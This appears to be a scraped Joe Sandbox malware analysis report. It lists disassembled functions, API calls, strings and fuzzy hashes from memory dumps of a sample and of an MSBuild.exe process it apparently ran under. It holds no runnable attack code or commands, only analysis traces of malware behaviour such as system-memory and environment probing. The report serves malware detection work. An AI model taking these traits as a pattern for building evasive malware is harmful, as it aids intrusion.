Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: type_info::operator!=
String ID: Modulus$PublicExponent
API String ID: 2241493438-3324115277
Opcode ID: 0e2a5755500b267a170b4fce764c61f9163e2e4d1abfdae3ad90def736d98f5e
Instruction ID: 57ab5220af5530ee15c61c8bb75ff2822d2ca0b52f6a873397bc8f4792dcdda4
Opcode Fuzzy Hash: 0e2a5755500b267a170b4fce764c61f9163e2e4d1abfdae3ad90def736d98f5e
Instruction Fuzzy Hash: B211E071909344AEC600DF2D884158BFBE4AFE6248F411A6EF9845BB60DB31D94DCBD6

Function 6CF3B5F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF3B605

Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF690ED
Part of subcall function 6CF690D8: __CxxThrowException@8.LIBCMT ref: 6CF69102
Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF69113

_memmove.LIBCMT ref: 6CF3B634

Strings

vector<T> too long, xrefs: 6CF3B600

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 26ae07d641eadb372b4638033bb98465d78f1f36aeed4a0c0c778d3fbcd1582f
Instruction ID: 722552305859cce533aa084eb1f4e63124c980a58d9872013fad76419a934135
Opcode Fuzzy Hash: 26ae07d641eadb372b4638033bb98465d78f1f36aeed4a0c0c778d3fbcd1582f
Instruction Fuzzy Hash: 400184B26006059FD724DFA9DC91CA7B3E8EB542147144E2DE99BC3B50EA71F9088B60

Function 6CF64230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF64241

Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF690ED
Part of subcall function 6CF690D8: __CxxThrowException@8.LIBCMT ref: 6CF69102
Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF69113

_memmove.LIBCMT ref: 6CF64277

Strings

vector<bool> too long, xrefs: 6CF6423C

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<bool> too long
API String ID: 1785806476-842332957
Opcode ID: 6af6653e2f7d1f59a4a345d127f6ec6a66b30e67cd6f0ba4db0e2a2380521eb7
Instruction ID: b36559e8c92d6eb9336891f951f200029e1194eb24464625a8ce785af6dd18c6
Opcode Fuzzy Hash: 6af6653e2f7d1f59a4a345d127f6ec6a66b30e67cd6f0ba4db0e2a2380521eb7
Instruction Fuzzy Hash: 3601F772A001055FC704DF6ADCE08AEF7A9FB84358F61432AE51687E44E731ED18C7A0

Function 6CF63840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF63855

Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF690ED
Part of subcall function 6CF690D8: __CxxThrowException@8.LIBCMT ref: 6CF69102
Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF69113

_memmove.LIBCMT ref: 6CF63880

Strings

vector<T> too long, xrefs: 6CF63850

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 9d93f18813ce3857dd8f786142dfbc3bf3b67b7eea2e2b925d76e15aa41c572c
Instruction ID: 3acca3705596d7340bf35d01f6b809b28d4edfadec539c3277dfd835ab730889
Opcode Fuzzy Hash: 9d93f18813ce3857dd8f786142dfbc3bf3b67b7eea2e2b925d76e15aa41c572c
Instruction Fuzzy Hash: 090171725006099FD314DFBAD88489AB3E8EB442147114A3DE5AAD3F50EA71F9088B60

Function 6CF15160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF15173

Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF690ED
Part of subcall function 6CF690D8: __CxxThrowException@8.LIBCMT ref: 6CF69102
Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF69113

_memmove.LIBCMT ref: 6CF1519E

Strings

vector<T> too long, xrefs: 6CF1516E

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 8068ed11ee133f3a4fe699d02e1b34557006fd98876c45b4b7123881bd2cb96d
Instruction ID: 019a1009e4bcf6cab0b071493663338b5d1e74cdcadfde9ce986e5360516e492
Opcode Fuzzy Hash: 8068ed11ee133f3a4fe699d02e1b34557006fd98876c45b4b7123881bd2cb96d
Instruction Fuzzy Hash: 8C01A2B16042059FD728CFB9CC9186BB3E8EB542547154A2DE89AD3F40EB31F908CB61

Function 6CF6BFB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CF6ABC3: __getptd.LIBCMT ref: 6CF6ABC9
Part of subcall function 6CF6ABC3: __getptd.LIBCMT ref: 6CF6ABD9

__getptd.LIBCMT ref: 6CF6BFC3

Part of subcall function 6CF6EAE6: __getptd_noexit.LIBCMT ref: 6CF6EAE9
Part of subcall function 6CF6EAE6: __amsg_exit.LIBCMT ref: 6CF6EAF6

__getptd.LIBCMT ref: 6CF6BFD1

Strings

csm, xrefs: 6CF6BFDF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
Instruction ID: a2633ef3dd5e824e914726cbcb391c3b90d222650ede74683d29440d3f807bec
Opcode Fuzzy Hash: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
Instruction Fuzzy Hash: CC016939801304AFDF24AF63D540AADBBF5BF08319F65592EE0D19AE90CB389584DB81

Function 6CF73EA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6CF73ED9
DName::DName.LIBCMT ref: 6CF73EE5

Strings

{flat}, xrefs: 6CF73ED4

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: ca3be3ccb1f97c6eda46673c970589e381a90071fe0fddfd2aad56d401174b4e
Instruction ID: a8e07b15ce184745b25e00c41514c8b60b1ad1ab1d727367d59d1457dc04d371
Opcode Fuzzy Hash: ca3be3ccb1f97c6eda46673c970589e381a90071fe0fddfd2aad56d401174b4e
Instruction Fuzzy Hash: A0F0A071141244AFDB20CF58E050BE83BB09F42759F048046E94C0F752C772D84AC761

Function 6CF17680 Relevance: 5.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,A64A5C11), ref: 6CF176AD
LeaveCriticalSection.KERNEL32(?,?,?,A64A5C11), ref: 6CF176FF
EnterCriticalSection.KERNEL32(A64A5C11,?,?,?,A64A5C11), ref: 6CF1770D
LeaveCriticalSection.KERNEL32(A64A5C11,?,00000000,?,?,?,?,A64A5C11), ref: 6CF1772A

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

Part of subcall function 6CF16D40: _rand.LIBCMT ref: 6CF16DEA

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: CriticalSection$EnterLeave$_malloc_rand
String ID:
API String ID: 119520971-0
Opcode ID: cebba28d21e57140c473133ca9be789c127bc47bce13ad502b220ac7df0f14d3
Instruction ID: f126684d76ca6af804015c1073f6a1b3b45f89097c408fadd875b482ed0a456c
Opcode Fuzzy Hash: cebba28d21e57140c473133ca9be789c127bc47bce13ad502b220ac7df0f14d3
Instruction Fuzzy Hash: C2216571905609AFCB10DF55CC44AEBB7BCFF41254F114626E81697A40EB70AA05CBA0

Function 6CF19580 Relevance: 5.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?), ref: 6CF195A9
LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 6CF195CA
EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6CF195DA
LeaveCriticalSection.KERNEL32(00000000,?,?,?), ref: 6CF195FB

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 86462017963b4547d0681e143c2c0ec88f90e51ff73c71967bd0e9cbe8b4ddd8
Instruction ID: b55658ab0864965dcbad2d942f1b6647d6a339856a698dc21566e270f88e7317
Opcode Fuzzy Hash: 86462017963b4547d0681e143c2c0ec88f90e51ff73c71967bd0e9cbe8b4ddd8
Instruction Fuzzy Hash: DE117232A09108EFC700CF99E880DEEFBBCFF51214B10419AE515A7A10DB30EA55CBE0

Analysis Process: MSBuild.exePID: 3948, Parent PID: 7084COMMON

Execution Graph

Execution Coverage:	14.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.4%
Total number of Nodes:	222
Total number of Limit Nodes:	8

Executed Functions

Function 0042D2F0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 241
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL ref: 0042D33B
GetSystemMetrics.USER32 ref: 0042D34E
DeleteObject.GDI32 ref: 0042D3C7
SelectObject.GDI32 ref: 0042D41F
SelectObject.GDI32 ref: 0042D498
DeleteObject.GDI32 ref: 0042D4D2

Strings

, xrefs: 0042D467

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
String ID:
API String ID: 1449868515-3916222277
Opcode ID: 48f309b9e6e974fb046aa370e8cc896fcbde11d32cefb85c4907667ba4c6e23d
Instruction ID: ce5568e478f28e7a72732ba1a6b09f7deb15219a35a265dfff5935a0bcb8df87
Opcode Fuzzy Hash: 48f309b9e6e974fb046aa370e8cc896fcbde11d32cefb85c4907667ba4c6e23d
Instruction Fuzzy Hash: 98E19EB450AB818FE774DF15E58878EBBF0BB89304F51892EE8988B351C7745548CF8A

Function 00437160 Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043A1FC,?,00000006,00120089,?,00000018,8A959497,00000000,004155DA), ref: 00437186

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82

Function 0042850D Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2c232c657e8add72788b54b8d3443a0c9bcef4c159be91bc5e1cc6edd8eafb3
Instruction ID: ba7a1eca14638323707782375b75a66115b24ef33f296584d306fb7807420eb0
Opcode Fuzzy Hash: d2c232c657e8add72788b54b8d3443a0c9bcef4c159be91bc5e1cc6edd8eafb3
Instruction Fuzzy Hash: 49F074B45093808FD724DF28D554B5ABBE0BB88344F419D2DE589C7391DB749544CB46

Function 00429D51 Relevance: 38.6, APIs: 1, Strings: 21, Instructions: 83
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 00429E8F

Strings

1, xrefs: 00429DBF
4, xrefs: 00429DEF
&, xrefs: 00429DDF
=, xrefs: 00429DAF
C, xrefs: 00429DF7
(, xrefs: 00429D9F
q, xrefs: 00429D87
{, xrefs: 00429DB7
!, xrefs: 00429D6F
#, xrefs: 00429D7F
w, xrefs: 00429D97
y, xrefs: 00429DC7
A, xrefs: 00429E07
:, xrefs: 00429D5F
3, xrefs: 00429DCF
@, xrefs: 00429DFF
m, xrefs: 00429D67
s, xrefs: 00429D77
}, xrefs: 00429DE7
u, xrefs: 00429DA7
", xrefs: 00429D8F

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: AllocString
String ID: !$"$#$&$($1$3$4$:$=$@$A$C$m$q$s$u$w$y${$}
API String ID: 2525500382-2568387391
Opcode ID: 9a97aac4cbb77f5de27144f540d023079a5616cc1b91066b948806050a7f1106
Instruction ID: a27d3065e464ef83a8d677b75d5a5aab574e471b629993702521494ebcf7950b
Opcode Fuzzy Hash: 9a97aac4cbb77f5de27144f540d023079a5616cc1b91066b948806050a7f1106
Instruction Fuzzy Hash: 2A41B27460C3C08EE331CB68C05979BFBE1AB96308F04485ED4CD8B292C7BA9549CB67

Function 0041D233 Relevance: 6.4, APIs: 4, Instructions: 415
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041D309
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041D336

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: d5132f928d26fe8b6fe3b30d9c09749a357d4bd11d26887bba10772bbc583247
Instruction ID: 4495d44d40ab12ecae9af05d32d8e154dd11d585f43ec24fb3574b9300ee897c
Opcode Fuzzy Hash: d5132f928d26fe8b6fe3b30d9c09749a357d4bd11d26887bba10772bbc583247
Instruction Fuzzy Hash: 69F1DFB4900B408FD724CF28C891B67B7F2FF89314F14466DE8A68B795E734A842CB95

Function 0041DDB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0041DE9C
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0041DECA

Strings

:9, xrefs: 0041DDFD

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: :9
API String ID: 237503144-997541006
Opcode ID: 88462c74301361cfa1fa045387f60149de33889ca7069c1ff4dfad3fbf2bb38a
Instruction ID: 39242e73c86656f4daf48b50c31b67e111af5e046f43dab5f1946baa0af3e995
Opcode Fuzzy Hash: 88462c74301361cfa1fa045387f60149de33889ca7069c1ff4dfad3fbf2bb38a
Instruction Fuzzy Hash: 6A51B0715087919BE314CF14C940BABBBE5FFC6704F008A2DF8D95B292D7B49985CB86

Function 00408FA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32 ref: 0040901F

Strings

primarily often on modified in or uses the on the play of is that eleet replacements leetspeak, ways other via used resemblance spellings similarity a internet. glyphs of it system or their character reflection, xrefs: 00408FE4

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: ExitProcess
String ID: primarily often on modified in or uses the on the play of is that eleet replacements leetspeak, ways other via used resemblance spellings similarity a internet. glyphs of it system or their character reflection
API String ID: 621844428-744483612
Opcode ID: 7f709a8a2815dc2f7eb5fa12ef2b0c31998d5f05e39d6dff6a1f02706ea0b0fc
Instruction ID: ca1574702f0dd97b30b58554de2a2c04af9efecb2b4661c1db87a1086d41268a
Opcode Fuzzy Hash: 7f709a8a2815dc2f7eb5fa12ef2b0c31998d5f05e39d6dff6a1f02706ea0b0fc
Instruction Fuzzy Hash: ADF068718182016AC6103B75DB0665F7BB45F5534CF00053FE9C472283EE7C984A979F

Function 00415400 Relevance: 3.1, APIs: 2, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0041543A
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 0041546E

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 98397620fac11dcd9822074c1170f201bf837d01a499e6674b8f74433fbaebe3
Instruction ID: 7ba3960c3de22f51f9f1b92dceeab9727af1971b5195ec1c07858123a76c5ed1
Opcode Fuzzy Hash: 98397620fac11dcd9822074c1170f201bf837d01a499e6674b8f74433fbaebe3
Instruction Fuzzy Hash: 6551DE355047419FD324DF24C881BABB3F5FFCA304F00462DE9898B292EB74A941CB96

Function 00425D16 Relevance: 1.8, APIs: 1, Instructions: 320COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042625F

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID:
API String ID: 3960555810-0
Opcode ID: df1e0963f5a09eec949dde1fe9452c85dbf21969e80cdc499b8490a87f29004b
Instruction ID: 3040b52ce46e2a68ac53cfdaf9fd4a89a3c3d66b049d6da847fec8ae0cbc9176
Opcode Fuzzy Hash: df1e0963f5a09eec949dde1fe9452c85dbf21969e80cdc499b8490a87f29004b
Instruction Fuzzy Hash: 82E1A030200B918AD735CF29D4947A3BBE1AF1A314F484AAEC4EB8B793D779A445CB54

Function 00426133 Relevance: 1.8, APIs: 1, Instructions: 273COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042625F

Memory Dump Source

Source File: 00000002.00000002.2147385624.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

